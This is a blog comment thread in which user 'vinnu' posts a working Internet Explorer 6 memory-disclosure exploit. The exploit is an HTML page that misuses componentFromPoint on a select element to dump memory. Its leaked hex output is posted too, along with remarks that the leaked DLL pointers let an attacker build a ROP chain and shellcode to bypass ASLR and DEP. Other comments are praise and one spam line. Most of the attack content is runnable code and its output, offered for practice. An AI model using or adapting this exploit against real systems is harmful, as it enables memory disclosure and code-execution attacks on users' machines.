Blog Comments

  1. hakooraevil's Avatar
    nice article vinnu, i want to know more information about emulators.
  2. "vinnu"'s Avatar
    output looks like :

    Code:
    Object.length : 9879369350050 
    77c2 0000 0003 99a0 0113 c2e3 77c2 0008 0000 b688 0013 042c 001a b060 0003 0008 
    0013 4383 75c5 1334 001c 023f 0000 004b 0000 b688 0013 2038 025b 9f98 0003 0008 
    0000 b688 0013 f2fc 001b b570 0003 0050 7714 e270 0111 e270 0111 b770 0013 0050 
    0013 de08 0013 3700 0113 af78 0003 0050 0013 de08 0013 e270 0111 af78 0003 0050 
    7714 9950 0113 9950 0113 df94 0013 0050 77c2 0000 0003 3240 0113 c2e3 77c2 004a 
    0013 dca4 0013 e7c8 0003 b650 0003 0008 0013 4383 75c5 b34c 001b b5a0 0003 004a 
    0013 de08 0013 c418 0003 b640 0003 0003 0000 b688 0013 0013 0000 714e 75c5 004a 
    7714 2f30 00d5 af78 0003 b600 0003 004a 0000 0000 0000 c380 0003 b510 0003 004a 
    0000 0000 0000 c310 0003 b620 0003 0050 77c2 0018 0000 e270 0111 e3e8 0013 0050 
    77c2 c3e7 77c2 e270 0111 e3d8 0013 0050 0003 e428 0013 e270 0111 e408 0013 0022 
    00ca 013b 000c 0000 0000 0049 0003 3240 0113 b530 0003 b358 0013 0008 0000 0000 
    0000 6d0e 55c0 0014 0000 b6ec 0003 0000 0000 0063 0068 0061 0072 0043 006f 0064 
    0065 0041 0074 0000 0000 0049 0003 0000 0000 b4d0 0003 42eb 75c5 0008 0000 000a 
    0000 442a bf2e 0010 0000 b728 0003 0000 0000 0074 006f 0053 0074 0072 0069 006e 
    0067 0000 0003 0049 0003 0000 0000 b4c0 0003 42eb 75c5 0008 0000 75f4 0003 cfa1 
    8c80 0012 0000 0000 0000 0000 0000 0073 0075 0062 0073 0074 0072 0069 006e 0067 
    0000 7841 0000 0006 0000 75f4 0003 0000 0000 0064 0069 0064 0000 000a 0000 b794 
    0003 75f4 0003 006c 0069 006d 0069 0074 0000 0049 033d e434 0013 b5f0 0003 e3d8 
    0013 0010 0000 0010 0000 7841 0000 0007 0022 0119 000c 3260 75c6 30cc 75c6 334c 
    75c6 0002 0000 aca8 0003 0000 0000 31c0 0113 deac 0013 0000 0aa0 0000 0000 0000 
    0000 0001 0000 0004 0007 0112 000c 0009 0000 0000 0000 e270 0111 c6b0 0003 fd9b 
    ffff 0000 0000 0005 0004 000f 0000 01a0 0003 01a0 0003 0040 0000 0001 0000 0002 
    0007 0001 0000 0188 0003 94a8 0003 0004 0005 01e9 0008 7ff8 75c5 0001 0000 000c 
    0000 9438 0003 000c 0000 0001 0000 001a 0004 01e5 0008 c090 0003 0063 0072 0069 
    0070 0074 0020 002d 0020 0061 006e 006f 006e 0079 006d 006f 0075 0073 0020 0066 
    0075 006e 0063 0074 0069 006f 006e 0000 0000 0000 0000 0000 0000 0000 0000 0000 
    0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 
    0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 
    0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 
    ----------------------
    ----------------------
    ----------------------
    Likewise disclosing several pointers inside loaded DLLs, which can be used to dynamically build the ROP chain + shellcode.

    ..."vinnu"
  3. "vinnu"'s Avatar
    Namaste

    Regarding ASLR following code leaks enough memory block to grab any loaded modules base address. Though the vulnerability is only affecting the IE 6 in win xp, but is a nice example for practice and for practice you can utilize this technique along with ROP to effectively bypass the ASLR+DEP in practice for expertise.

    Code:
    <html>
    <head>
    <title>IE 6 Memory disclosure exploit..."vinnu"</title>
    </head>
    <body>
    <div id="disc"></div>
    <script>
    var limit = 8000;// Above it will crash and may lead to Code Execution.
    var did = document.getElementById("disc");
    function discl()	{
    	var buf="";
    	var c="0000";
    	var d=0x0000;
    	/****************************************************/
    	var a=document.createElement("select");
    	var b=a.componentFromPoint(0xff,0xff);
    	/*** Vulnerable code. componentFromPoint() on an
    	unmaterialised object leads to leaking in memory. ***/
    	
    	did.innerHTML+="<br>Object.length : "+b.length;
    	buf="<table><tr>";
    	for(var i=0;i<limit;i++)	{
    		d = b.charCodeAt(i).toString(16);
    		buf+="<td>"+c.substring(0,4-d.toString().length)+d+"</td>";
    		if(i%16==0){buf+="</tr><tr>"}
    	}buf+="</tr></table>";
    	did.innerHTML += buf;
    }
    </script>
    <input type=button value="Disclose" onclick="discl()" />
    </body>
    </html>
  4. paulhall's Avatar
    This is a great technique, its really helpful . And the kind of its explanation you have shared is really appreciable.

    courier jobs
  5. b0nd's Avatar
    ... and the knowledge is overflowing keep sharing bro! Thanks a lot!